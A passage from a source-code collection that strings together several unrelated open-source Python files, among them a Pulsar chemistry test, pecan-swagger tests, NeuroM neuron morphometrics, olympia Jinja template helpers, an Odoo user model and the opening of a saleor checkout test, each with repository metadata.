sys.path.insert(0, os.path.join(os.path.dirname(thispath),"helper"))
from MiscFxns import *
from StandardModules import *
import pulsar_psi4
def ApplyBasis(syst,bsname,bslabel="primary"):
return psr.system.apply_single_basis(bslabel,bsname,syst)
def CompareEgy(EgyIn):
return abs(EgyIn+224.89287653924677)<0.00001
def CompareGrad(GradIn):
CorrectGrad=[
-0.000988976949000001, 0.0004443157829999993, 0.05238342271999999,
0.018237358511, -0.002547005771, -0.030731839919000005,
-0.02344281975, -0.0062568701740000005, -0.025360880303,
-0.015409293889000001, -0.047382578540999996, -0.012807191666999996,
0.016869055227000003, 0.024963490952999996, -0.017442968207000004,
0.007207092293000001, 0.025306999363999997, 0.023850402741000004,
0.019786523729999998, 0.04038960502300001, -0.028509120090000006,
-0.026869925129, -0.022975320699000004, 0.005627050168,
0.004610985953999999, -0.011942635934, 0.032991124551000006]
AllGood=True
for i in range(0,len(CorrectGrad)):
AllGood=AllGood and CorrectGrad[i]-GradIn[i]<0.00001
return AllGood
def Run(mm):
try:
tester = psr.testing.Tester("Testing Boys and Bernardi CP")
tester.print_header()
pulsar_psi4.pulsar_psi4_setup(mm)
LoadDefaultModules(mm)
mm.change_option("PSI4_SCF","BASIS_SET","sto-3g")
mm.change_option("PSR_CP","METHOD","PSI4_SCF")
mm.change_option("PSR_MBE","METHOD","PSI4_SCF")
mm.change_option("PSI4_SCF","PRINT",0)
mol=psr.system.make_system("""
0 1
O 1.2361419 1.0137761 -0.0612424
H 0.5104418 0.8944555 0.5514190
H 1.9926927 1.1973129 0.4956931
O -0.9957202 0.0160415 1.2422556
H -1.4542703 -0.5669741 1.8472817
H -0.9377950 -0.4817912 0.4267562
O -0.2432343 -1.0198566 -1.1953808
H 0.4367536 -0.3759433 -0.9973297
H -0.5031835 -0.8251492 -2.0957959
""")
mol = ApplyBasis(mol,"sto-3g","sto-3g")
wfn=psr.datastore.Wavefunction()
wfn.system=mol
MyMod=mm.get_module("PSR_CP",0)
NewWfn,Egy=MyMod.deriv(0,wfn)
tester.test("Testing CP Energy via Deriv(0)", True, CompareEgy, Egy[0])
NewWfn,Egy=MyMod.energy(wfn)
tester.test("Testing CP Energy via Energy()", True, CompareEgy, Egy)
NewWfn,Egy=MyMod.deriv(1,wfn)
tester.test("Testing CP Gradient via Deriv(1)", True, CompareGrad, Egy)
NewWfn,Egy=MyMod.gradient(wfn)
tester.test("Testing CP Gradient via Gradient()", True, CompareGrad, Egy)
tester.print_results()
except Exception as e:
psr.output.Output("Caught exception in main handler\n")
traceback.print_exc()
with psr.ModuleAdministrator() as mm:
Run(mm)
psr.finalize()
|
pulsar-chem/Pulsar-Core
|
test/old/Old2/modules/CP.py
|
Python
|
bsd-3-clause
| 2,969
|
import unittest
from pecan_swagger import utils
class TestUtils(unittest.TestCase):
def test_swagger_build(self):
from .resources import example_app
expected = {
"swagger": "2.0",
"info": {
"version": "1.0",
"title": "example_app"
},
"produces": [],
"consumes": [],
"paths": {
"/api": {
"get": {}
},
"/messages": {
"get": {},
"post": {}
},
"/profile": {
"get": {},
"post": {}
},
"/profile/image": {
"get": {},
"post": {}
},
"/profile/stats": {
"get": {}
}
}
}
actual = utils.swagger_build('example_app', '1.0')
self.assertDictEqual(expected, actual)
def test_swagger_build_wsme(self):
from .resources import example_wsme_app
expected = \
{
"consumes": [],
"info": {
"title": "example_wsme_app",
"version": "1.0"
},
"paths": {
"/api": {
"get": {}
},
"/messages": {
"get": {},
"post": {}
},
"/profile": {
"get": {},
"post": {}
},
"/profile/image": {
"get": {},
"post": {}
},
"/profile/stats": {
"get": {}
},
"/wsmemessages": {
"get": {
"description": "",
"parameters": [],
"responses": {
200: {
"description": "",
"schema": {
"items": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
},
"type": "array"
}
}
}
},
"post": {
"description": "",
"parameters": [
{
"in": "query",
"name": "message",
"required": True,
"type": "string"
}
],
"responses": {
201: {
"description": "",
"schema": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
}
}
}
}
},
"/wsmemessages/<specifier>": {
"delete": {
"description": "",
"parameters": [
{
"in": "query",
"name": "id",
"required": True,
"type": "string"
}
],
"responses": {
204: {
"description": ""
}
}
},
"get": {
"description": "",
"parameters": [
{
"in": "query",
"name": "id",
"required": True,
"type": "string"
}
],
"responses": {
200: {
"description": "",
"schema": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
}
}
}
}
},
"/wsmemessages/detail": {
"get": {
"description": "",
"parameters": [
{
"in": "query",
"name": "id",
"required": True,
"type": "string"
}
],
"responses": {
200: {
"description": "",
"schema": {
"items": {
"properties": {
"id": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message": {
"maxLength": 255,
"minLength": 1,
"type": "string"
},
"message_from": {
"enum": [
'1.OSOMATSU',
'2.KARAMATSU',
'3.CHOROMATSU',
'4.ICHIMATSU',
'5.JUSHIMATSU',
'6.TODOMATSU'
],
"type": "string"
},
"message_size": {
"minimum": 1,
"type": "integer"
}
}
},
"type": "object"
}
}
}
}
}
},
"produces": [],
"swagger": "2.0"
}
actual = utils.swagger_build('example_wsme_app', '1.0')
import codecs, json
fout = codecs.open('example_wsme_app.json', 'w', 'utf_8')
json.dump(actual, fout, sort_keys=True, indent=2)
self.maxDiff = None
self.assertDictEqual(expected, actual)
|
shu-mutou/pecan-swagger
|
tests/test_utils.py
|
Python
|
bsd-3-clause
| 10,382
|
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Morphometrics functions for neurons or neuron populations'''
import math
import numpy as np
from neurom.geom import bounding_box
from neurom.core.types import NeuriteType
from neurom.core.types import tree_type_checker as is_type
from neurom.core.dataformat import COLS
from neurom.core._neuron import iter_neurites, iter_segments
from neurom import morphmath
def neuron_population(nrns):
'''Makes sure `nrns` behaves like a neuron population'''
return nrns.neurons if hasattr(nrns, 'neurons') else (nrns,)
def soma_volume(nrn):
'''Get the volume of a neuron's soma.'''
return nrn.soma.volume
def soma_volumes(nrn_pop):
'''Get the volume of the somata in a population of neurons
Note:
If a single neuron is passed, a single element list with the volume
of its soma member is returned.
'''
nrns = neuron_population(nrn_pop)
return [soma_volume(n) for n in nrns]
def soma_surface_area(nrn, neurite_type=NeuriteType.soma):
'''Get the surface area of a neuron's soma.
Note:
The surface area is calculated by assuming the soma is spherical.
'''
assert neurite_type == NeuriteType.soma, 'Neurite type must be soma'
return 4 * math.pi * nrn.soma.radius ** 2
def soma_surface_areas(nrn_pop, neurite_type=NeuriteType.soma):
'''Get the surface areas of the somata in a population of neurons
Note:
The surface area is calculated by assuming the soma is spherical.
Note:
If a single neuron is passed, a single element list with the surface
area of its soma member is returned.
'''
nrns = neuron_population(nrn_pop)
assert neurite_type == NeuriteType.soma, 'Neurite type must be soma'
return [soma_surface_area(n) for n in nrns]
def soma_radii(nrn_pop, neurite_type=NeuriteType.soma):
''' Get the radii of the somata of a population of neurons
Note:
If a single neuron is passed, a single element list with the
radius of its soma member is returned.
'''
assert neurite_type == NeuriteType.soma, 'Neurite type must be soma'
nrns = neuron_population(nrn_pop)
return [n.soma.radius for n in nrns]
def trunk_section_lengths(nrn, neurite_type=NeuriteType.all):
'''list of lengths of trunk sections of neurites in a neuron'''
neurite_filter = is_type(neurite_type)
return [morphmath.section_length(s.root_node.points)
for s in nrn.neurites if neurite_filter(s)]
def trunk_origin_radii(nrn, neurite_type=NeuriteType.all):
'''radii of the trunk sections of neurites in a neuron'''
neurite_filter = is_type(neurite_type)
return [s.root_node.points[0][COLS.R] for s in nrn.neurites if neurite_filter(s)]
def trunk_origin_azimuths(nrn, neurite_type=NeuriteType.all):
'''Get a list of all the trunk origin azimuths of a neuron or population
The azimuth is defined as Angle between x-axis and the vector
defined by (initial tree point - soma center) on the x-z plane.
The range of the azimuth angle [-pi, pi] radians
'''
neurite_filter = is_type(neurite_type)
nrns = neuron_population(nrn)
def _azimuth(section, soma):
'''Azimuth of a section'''
vector = morphmath.vector(section[0], soma.center)
return np.arctan2(vector[COLS.Z], vector[COLS.X])
return [_azimuth(s.root_node.points, n.soma)
for n in nrns
for s in n.neurites if neurite_filter(s)]
def trunk_origin_elevations(nrn, neurite_type=NeuriteType.all):
'''Get a list of all the trunk origin elevations of a neuron or population
The elevation is defined as the angle between x-axis and the
vector defined by (initial tree point - soma center)
on the x-y half-plane.
The range of the elevation angle [-pi/2, pi/2] radians
'''
neurite_filter = is_type(neurite_type)
nrns = neuron_population(nrn)
def _elevation(section, soma):
'''Elevation of a section'''
vector = morphmath.vector(section[0], soma.center)
norm_vector = np.linalg.norm(vector)
if norm_vector >= np.finfo(type(norm_vector)).eps:
return np.arcsin(vector[COLS.Y] / norm_vector)
raise ValueError("Norm of vector between soma center and section is almost zero.")
return [_elevation(s.root_node.points, n.soma)
for n in nrns
for s in n.neurites if neurite_filter(s)]
def trunk_vectors(nrn, neurite_type=NeuriteType.all):
'''Calculates the vectors between all the trunks of the neuron
and the soma center.
'''
neurite_filter = is_type(neurite_type)
nrns = neuron_population(nrn)
return np.array([morphmath.vector(s.root_node.points[0], n.soma.center)
for n in nrns
for s in n.neurites if neurite_filter(s)])
def trunk_angles(nrn, neurite_type=NeuriteType.all):
'''Calculates the angles between all the trunks of the neuron.
The angles are defined on the x-y plane and the trees
are sorted from the y axis and anticlock-wise.
'''
vectors = trunk_vectors(nrn, neurite_type=neurite_type)
# In order to avoid the failure of the process in case the neurite_type does not exist
if not vectors.size:
return []
def _sort_angle(p1, p2):
"""Angle between p1-p2 to sort vectors"""
ang1 = np.arctan2(*p1[::-1])
ang2 = np.arctan2(*p2[::-1])
return (ang1 - ang2)
# Sorting angles according to x-y plane
order = np.argsort(np.array([_sort_angle(i / np.linalg.norm(i), [0, 1])
for i in vectors[:, 0:2]]))
ordered_vectors = vectors[order][:, [COLS.X, COLS.Y]]
return [morphmath.angle_between_vectors(ordered_vectors[i], ordered_vectors[i - 1])
for i, _ in enumerate(ordered_vectors)]
def sholl_crossings(neurites, center, radii):
'''calculate crossings of neurites
Args:
nrn(morph): morphology on which to perform Sholl analysis
radii(iterable of floats): radii for which crossings will be counted
Returns:
Array of same length as radii, with a count of the number of crossings
for the respective radius
'''
def _count_crossings(neurite, radius):
'''count_crossings of segments in neurite with radius'''
r2 = radius ** 2
count = 0
for start, end in iter_segments(neurite):
start_dist2, end_dist2 = (morphmath.point_dist2(center, start),
morphmath.point_dist2(center, end))
count += int(start_dist2 <= r2 <= end_dist2 or
end_dist2 <= r2 <= start_dist2)
return count
return np.array([sum(_count_crossings(neurite, r)
for neurite in iter_neurites(neurites))
for r in radii])
def sholl_frequency(nrn, neurite_type=NeuriteType.all, step_size=10):
'''perform Sholl frequency calculations on a population of neurites
Args:
nrn(morph): nrn or population
neurite_type(NeuriteType): which neurites to operate on
step_size(float): step size between Sholl radii
Note:
Given a neuron, the soma center is used for the concentric circles,
which range from the soma radii, and the maximum radial distance
in steps of `step_size`. When a population is given, the concentric
circles range from the smallest soma radius to the largest radial neurite
distance. Finally, each segment of the neuron is tested, so a neurite that
bends back on itself, and crosses the same Sholl radius will get counted as
having crossed multiple times.
'''
nrns = neuron_population(nrn)
neurite_filter = is_type(neurite_type)
min_soma_edge = float('Inf')
max_radii = 0
neurites_list = []
for neuron in nrns:
neurites_list.extend(((neurites, neuron.soma.center)
for neurites in neuron.neurites
if neurite_filter(neurites)))
min_soma_edge = min(min_soma_edge, neuron.soma.radius)
max_radii = max(max_radii, np.max(np.abs(bounding_box(neuron))))
radii = np.arange(min_soma_edge, max_radii + step_size, step_size)
ret = np.zeros_like(radii)
for neurites, center in neurites_list:
ret += sholl_crossings(neurites, center, radii)
return ret
|
eleftherioszisis/NeuroM
|
neurom/fst/_neuronfunc.py
|
Python
|
bsd-3-clause
| 10,088
|
import collections
import json as jsonlib
import os
import random
import re
from operator import attrgetter
from urlparse import urljoin
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.forms import CheckboxInput
from django.template import defaultfilters, loader
from django.utils.encoding import smart_text
from django.utils.functional import lazy
from django.utils.html import format_html as django_format_html
from django.utils.safestring import mark_safe
from django.utils.translation import (
get_language, to_locale, trim_whitespace, ugettext)
import jinja2
import waffle
from babel.support import Format
from django_jinja import library
from rest_framework.reverse import reverse as drf_reverse
from rest_framework.settings import api_settings
from olympia import amo
from olympia.amo import urlresolvers, utils
from olympia.constants.licenses import PERSONA_LICENSES_IDS
from olympia.lib.jingo_minify_helpers import (
_build_html, _get_compiled_css_url, get_css_urls, get_js_urls, get_path,
is_external)
from olympia.lib.cache import cache_get_or_set, make_key
# Registering some utils as filters:
urlparams = library.filter(utils.urlparams)
library.filter(utils.epoch)
library.filter(utils.isotime)
library.global_function(dict)
library.global_function(utils.randslice)
# Mark a lazy marked instance as safe but keep
# it lazy
mark_safe_lazy = lazy(mark_safe, unicode)
@library.global_function
def switch_is_active(switch_name):
return waffle.switch_is_active(switch_name)
@library.filter
def link(item):
html = """<a href="%s">%s</a>""" % (item.get_url_path(),
jinja2.escape(item.name))
return jinja2.Markup(html)
@library.filter
def xssafe(value):
"""
Like |safe but for strings with interpolation.
By using |xssafe you assert that you have written tests proving an
XSS can't happen here.
"""
return jinja2.Markup(value)
@library.global_function
def locale_url(url):
"""Take a URL and give it the locale prefix."""
prefixer = urlresolvers.get_url_prefix()
script = prefixer.request.META['SCRIPT_NAME']
parts = [script, prefixer.locale, url.lstrip('/')]
return '/'.join(parts)
@library.global_function
def url(viewname, *args, **kwargs):
"""Helper for Django's ``reverse`` in templates."""
add_prefix = kwargs.pop('add_prefix', True)
host = kwargs.pop('host', '')
src = kwargs.pop('src', '')
url = '%s%s' % (host, urlresolvers.reverse(viewname,
args=args,
kwargs=kwargs,
add_prefix=add_prefix))
if src:
url = urlparams(url, src=src)
return url
@library.global_function
@jinja2.contextfunction
def drf_url(context, viewname, *args, **kwargs):
"""Helper for DjangoRestFramework's ``reverse`` in templates."""
request = context.get('request')
if request:
if not hasattr(request, 'versioning_scheme'):
request.versioning_scheme = api_settings.DEFAULT_VERSIONING_CLASS()
request.version = request.versioning_scheme.determine_version(
request, *args, **kwargs)
return drf_reverse(viewname, request=request, args=args, kwargs=kwargs)
@library.global_function
def services_url(viewname, *args, **kwargs):
"""Helper for ``url`` with host=SERVICES_URL."""
kwargs.update({'host': settings.SERVICES_URL})
return url(viewname, *args, **kwargs)
@library.filter
def paginator(pager):
return PaginationRenderer(pager).render()
@library.filter
def impala_paginator(pager):
t = loader.get_template('amo/impala/paginator.html')
return jinja2.Markup(t.render({'pager': pager}))
@library.global_function
def sidebar(app):
"""Populates the sidebar with (categories, types)."""
from olympia.addons.models import Category
if app is None:
return [], []
# Fetch categories...
qs = Category.objects.filter(application=app.id, weight__gte=0,
type=amo.ADDON_EXTENSION)
# Now sort them in python according to their name property (which looks up
# the translated name using gettext + our constants)
categories = sorted(qs, key=attrgetter('weight', 'name'))
Type = collections.namedtuple('Type', 'id name url')
base = urlresolvers.reverse('home')
types = [Type(99, ugettext('Collections'), base + 'collections/')]
shown_types = {
amo.ADDON_PERSONA: urlresolvers.reverse('browse.personas'),
amo.ADDON_DICT: urlresolvers.reverse('browse.language-tools'),
amo.ADDON_SEARCH: urlresolvers.reverse('browse.search-tools'),
amo.ADDON_THEME: urlresolvers.reverse('browse.themes'),
}
titles = dict(
amo.ADDON_TYPES,
**{amo.ADDON_DICT: ugettext('Dictionaries & Language Packs')})
for type_, url in shown_types.items():
if type_ in app.types:
types.append(Type(type_, titles[type_], url))
return categories, sorted(types, key=lambda x: x.name)
class PaginationRenderer(object):
def __init__(self, pager):
self.pager = pager
self.max = 10
self.span = (self.max - 1) / 2
self.page = pager.number
self.num_pages = pager.paginator.num_pages
self.count = pager.paginator.count
pager.page_range = self.range()
pager.dotted_upper = self.num_pages not in pager.page_range
pager.dotted_lower = 1 not in pager.page_range
def range(self):
"""Return a list of page numbers to show in the paginator."""
page, total, span = self.page, self.num_pages, self.span
if total < self.max:
lower, upper = 0, total
elif page < span + 1:
lower, upper = 0, span * 2
elif page > total - span:
lower, upper = total - span * 2, total
else:
lower, upper = page - span, page + span - 1
return range(max(lower + 1, 1), min(total, upper) + 1)
def render(self):
c = {'pager': self.pager, 'num_pages': self.num_pages,
'count': self.count}
t = loader.get_template('amo/paginator.html').render(c)
return jinja2.Markup(t)
def _get_format():
lang = get_language()
return Format(utils.get_locale_from_lang(lang))
@library.filter
def numberfmt(num, format=None):
return _get_format().decimal(num, format)
def page_name(app=None):
"""Determine the correct page name for the given app (or no app)."""
if app:
return ugettext(u'Add-ons for {0}').format(app.pretty)
else:
return ugettext('Add-ons')
@library.global_function
@jinja2.contextfunction
def page_title(context, title):
title = smart_text(title)
base_title = page_name(context['request'].APP)
# The following line doesn't use string formatting because we want to
# preserve the type of `title` in case it's a jinja2 `Markup` (safe,
# escaped) object.
return django_format_html(u'{} :: {}', title, base_title)
@library.filter
def json(s):
return jsonlib.dumps(s)
@library.filter
def absolutify(url, site=None):
"""Takes a URL and prepends the SITE_URL"""
if url.startswith('http'):
return url
else:
return urljoin(site or settings.SITE_URL, url)
@library.filter
def strip_controls(s):
"""
Strips control characters from a string.
"""
# Translation table of control characters.
control_trans = dict((n, None) for n in xrange(32) if n not in [10, 13])
rv = unicode(s).translate(control_trans)
return jinja2.Markup(rv) if isinstance(s, jinja2.Markup) else rv
@library.filter
def external_url(url):
"""Bounce a URL off outgoing.prod.mozaws.net."""
return urlresolvers.get_outgoing_url(unicode(url))
@library.filter
def shuffle(sequence):
"""Shuffle a sequence."""
random.shuffle(sequence)
return sequence
@library.global_function
def license_link(license):
"""Link to a code license, including icon where applicable."""
# If passed in an integer, try to look up the License.
from olympia.versions.models import License
if isinstance(license, (long, int)):
if license in PERSONA_LICENSES_IDS:
# Grab built-in license.
license = PERSONA_LICENSES_IDS[license]
else:
# Grab custom license.
license = License.objects.filter(id=license)
if not license.exists():
return ''
license = license[0]
elif not license:
return ''
if not getattr(license, 'builtin', True):
return ugettext('Custom License')
template = loader.get_template('amo/license_link.html')
return jinja2.Markup(template.render({'license': license}))
@library.global_function
def field(field, label=None, **attrs):
if label is not None:
field.label = label
# HTML from Django is already escaped.
return jinja2.Markup(u'%s<p>%s%s</p>' %
(field.errors, field.label_tag(),
field.as_widget(attrs=attrs)))
@library.global_function
@library.render_with('amo/category-arrow.html')
@jinja2.contextfunction
def category_arrow(context, key, prefix):
d = dict(context.items())
d.update(key=key, prefix=prefix)
return d
@library.filter
def timesince(time):
if not time:
return u''
ago = defaultfilters.timesince(time)
# L10n: relative time in the past, like '4 days ago'
return ugettext(u'{0} ago').format(ago)
@library.global_function
@library.render_with('amo/recaptcha.html')
@jinja2.contextfunction
def recaptcha(context, form):
d = dict(context.items())
d.update(form=form)
return d
@library.filter
def is_choice_field(value):
try:
return isinstance(value.field.widget, CheckboxInput)
except AttributeError:
pass
@library.global_function
@jinja2.contextfunction
def cache_buster(context, url):
if 'BUILD_ID' in context:
build = context['BUILD_ID']
else:
if url.endswith('.js'):
build = context['BUILD_ID_JS']
elif url.endswith('.css'):
build = context['BUILD_ID_CSS']
else:
build = context['BUILD_ID_IMG']
return utils.urlparams(url, b=build)
@library.global_function
@jinja2.contextfunction
def media(context, url):
"""Get a MEDIA_URL link with a cache buster querystring."""
return urljoin(settings.MEDIA_URL, cache_buster(context, url))
@library.global_function
@jinja2.contextfunction
def static(context, url):
"""Get a STATIC_URL link with a cache buster querystring."""
return urljoin(settings.STATIC_URL, cache_buster(context, url))
@library.global_function
@jinja2.evalcontextfunction
def attrs(ctx, *args, **kw):
return jinja2.filters.do_xmlattr(ctx, dict(*args, **kw))
@library.global_function
@jinja2.contextfunction
def side_nav(context, addon_type, category=None):
app = context['request'].APP.id
cat = str(category.id) if category else 'all'
cache_key = make_key(
'side-nav-%s-%s-%s' % (app, addon_type, cat),
# We have potentially very long names in the cache-key,
# normalize to not hit any memcached key-limits
normalize=True)
return cache_get_or_set(
cache_key, lambda: _side_nav(context, addon_type, category))
def _side_nav(context, addon_type, cat):
# Prevent helpers generating circular imports.
from olympia.addons.models import Category, Addon
request = context['request']
qs = Category.objects.filter(weight__gte=0)
if addon_type != amo.ADDON_PERSONA:
qs = qs.filter(application=request.APP.id)
sort_key = attrgetter('weight', 'name')
categories = sorted(qs.filter(type=addon_type), key=sort_key)
if cat:
base_url = cat.get_url_path()
else:
base_url = Addon.get_type_url(addon_type)
ctx = dict(request=request, base_url=base_url, categories=categories,
addon_type=addon_type, amo=amo)
template = loader.get_template('amo/side_nav.html')
return jinja2.Markup(template.render(ctx))
@library.global_function
@jinja2.contextfunction
def site_nav(context):
app = context['request'].APP.id
cache_key = make_key('site-nav-%s' % app, normalize=True)
return cache_get_or_set(cache_key, lambda: _site_nav(context))
def _site_nav(context):
# Prevent helpers from generating circular imports.
from olympia.addons.models import Category
request = context['request']
def sorted_cats(qs):
return sorted(qs, key=attrgetter('weight', 'name'))
extensions = Category.objects.filter(
application=request.APP.id, weight__gte=0, type=amo.ADDON_EXTENSION)
personas = Category.objects.filter(weight__gte=0, type=amo.ADDON_PERSONA)
ctx = dict(request=request, amo=amo,
extensions=sorted_cats(extensions),
personas=sorted_cats(personas))
template = loader.get_template('amo/site_nav.html')
return jinja2.Markup(template.render(ctx))
@library.global_function
def loc(s):
"""A noop function for strings that are not ready to be localized."""
return trim_whitespace(s)
@library.global_function
def site_event_type(type):
return amo.SITE_EVENT_CHOICES[type]
@library.global_function
@jinja2.contextfunction
def remora_url(context, url, lang=None, app=None, prefix=''):
"""Wrapper for urlresolvers.remora_url"""
if lang is None:
_lang = context['LANG']
if _lang:
lang = to_locale(_lang).replace('_', '-')
if app is None:
try:
app = context['APP'].short
except (AttributeError, KeyError):
pass
return urlresolvers.remora_url(url=url, lang=lang, app=app, prefix=prefix)
@library.global_function
@jinja2.contextfunction
def hasOneToOne(context, obj, attr):
try:
getattr(obj, attr)
return True
except ObjectDoesNotExist:
return False
@library.global_function
def no_results_amo():
# This prints a "No results found" message. That's all. Carry on.
t = loader.get_template('amo/no_results.html').render()
return jinja2.Markup(t)
def _relative_to_absolute(url):
"""
Prepends relative URLs with STATIC_URL to turn those inline-able.
This method is intended to be used as a ``replace`` parameter of
``re.sub``.
"""
url = url.group(1).strip('"\'')
if not url.startswith(('data:', 'http:', 'https:', '//')):
url = url.replace('../../', settings.STATIC_URL)
return 'url(%s)' % url
@library.global_function
def inline_css(bundle, media=False, debug=None):
"""
If we are in debug mode, just output a single style tag for each css file.
If we are not in debug mode, return a style that contains bundle-min.css.
Forces a regular css() call for external URLs (no inline allowed).
Extracted from jingo-minify and re-registered, see:
https://github.com/jsocol/jingo-minify/pull/41
Added: turns relative links to absolute ones using STATIC_URL.
"""
if debug is None:
debug = getattr(settings, 'DEBUG', False)
if debug:
items = [_get_compiled_css_url(i)
for i in settings.MINIFY_BUNDLES['css'][bundle]]
else:
items = ['css/%s-min.css' % bundle]
if not media:
media = getattr(settings, 'CSS_MEDIA_DEFAULT', 'screen,projection,tv')
contents = []
for css in items:
if is_external(css):
return _build_html([css], '<link rel="stylesheet" media="%s" '
'href="%%s" />' % media)
with open(get_path(css), 'r') as f:
css_content = f.read()
css_parsed = re.sub(r'url\(([^)]*?)\)',
_relative_to_absolute,
css_content)
contents.append(css_parsed)
return _build_html(contents, '<style type="text/css" media="%s">%%s'
'</style>' % media)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_path(what):
"""Make it possible to override storage paths in settings.
By default, all storage paths are in the MEDIA_ROOT.
This is backwards compatible.
"""
default = os.path.join(settings.MEDIA_ROOT, what)
key = "{0}_PATH".format(what.upper())
return getattr(settings, key, default)
# A (temporary?) copy of this is in services/utils.py. See bug 1055654.
def user_media_url(what):
"""
Generate default media url, and make possible to override it from
settings.
"""
default = '%s%s/' % (settings.MEDIA_URL, what)
key = "{0}_URL".format(what.upper().replace('-', '_'))
return getattr(settings, key, default)
def id_to_path(pk):
"""
Generate a path from an id, to distribute folders in the file system.
1 => 1/1/1
12 => 2/12/12
123456 => 6/56/123456
"""
pk = unicode(pk)
path = [pk[-1]]
if len(pk) >= 2:
path.append(pk[-2:])
else:
path.append(pk)
path.append(pk)
return os.path.join(*path)
@library.filter
def hidden_field(field):
return field.as_widget(attrs={'style': 'display:none'})
@library.filter
def format_html(string, *args, **kwargs):
"""Uses ``str.format`` for string interpolation.
Uses ``django.utils.html:format_html`` internally.
>>> {{ "{0} arguments, {x} arguments"|format_html('args', x='kwargs') }}
"positional args, kwargs arguments"
Checks both, *args and **kwargs for potentially unsafe arguments (
not marked as `mark_safe`) and escapes them appropriately.
"""
return django_format_html(smart_text(string), *args, **kwargs)
@library.global_function
def js(bundle, debug=None, defer=False, async=False):
"""
If we are in debug mode, just output a single script tag for each js file.
If we are not in debug mode, return a script that points at bundle-min.js.
Copied from jingo-minify until we switch to something better...
"""
attrs = []
urls = get_js_urls(bundle, debug)
attrs.append('src="%s"')
if defer:
attrs.append('defer')
if async:
attrs.append('async')
return _build_html(urls, '<script %s></script>' % ' '.join(attrs))
@library.global_function
def css(bundle, media=False, debug=None):
"""
If we are in debug mode, just output a single script tag for each css file.
If we are not in debug mode, return a script that points at bundle-min.css.
"""
urls = get_css_urls(bundle, debug)
if not media:
media = getattr(settings, 'CSS_MEDIA_DEFAULT', 'screen,projection,tv')
return _build_html(urls, '<link rel="stylesheet" media="%s" href="%%s" />'
% media)
@library.filter
def nl2br(string):
"""Turn newlines into <br/>."""
if not string:
return ''
return jinja2.Markup('<br/>'.join(jinja2.escape(string).splitlines()))
@library.filter(name='date')
def format_date(value, format='DATE_FORMAT'):
return defaultfilters.date(value, format)
@library.filter(name='datetime')
def format_datetime(value, format='DATETIME_FORMAT'):
return defaultfilters.date(value, format)
@library.filter
def class_selected(a, b):
"""Return ``'class="selected"'`` if ``a == b``."""
return mark_safe('class="selected"' if a == b else '')
|
lavish205/olympia
|
src/olympia/amo/templatetags/jinja_helpers.py
|
Python
|
bsd-3-clause
| 19,484
|
from django.db import models
from django.contrib.auth.models import User
class OdooUser(models.Model):
user = models.OneToOneField(User)
odoo_id = models.BigIntegerField(primary_key=True)
username = models.CharField(max_length=256)
|
JulienDrecq/django-odoo-auth
|
odoo_auth/models.py
|
Python
|
bsd-3-clause
| 246
|
import pytest
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from mock import MagicMock, Mock
from prices import Price
from saleor.checkout import views
from saleor.checkout.core import STORAGE_SESSION_KEY, Checkout
from saleor.shipping.models import ShippingMethodCountry
from saleor.userprofile.models import Address
def test_checkout_version():
checkout = Checkout(Mock(), AnonymousUser(), 'tracking_code')
storage = checkout.for_storage()
assert storage['version'] == Checkout.VERSION
@pytest.mark.parametrize('storage_data, expected_storage', [
({'version': Checkout.VERSION, 'new': 1}, {'version': Checkout.VERSION, 'new': 1}),
({'version': 'wrong', 'new': 1}, {'version': Checkout.VERSION}),
({'new': 1}, {'version': Checkout.VERSION}),
({}, {'version': Checkout.VERSION}),
(None, {'version': Checkout.VERSION}),
])
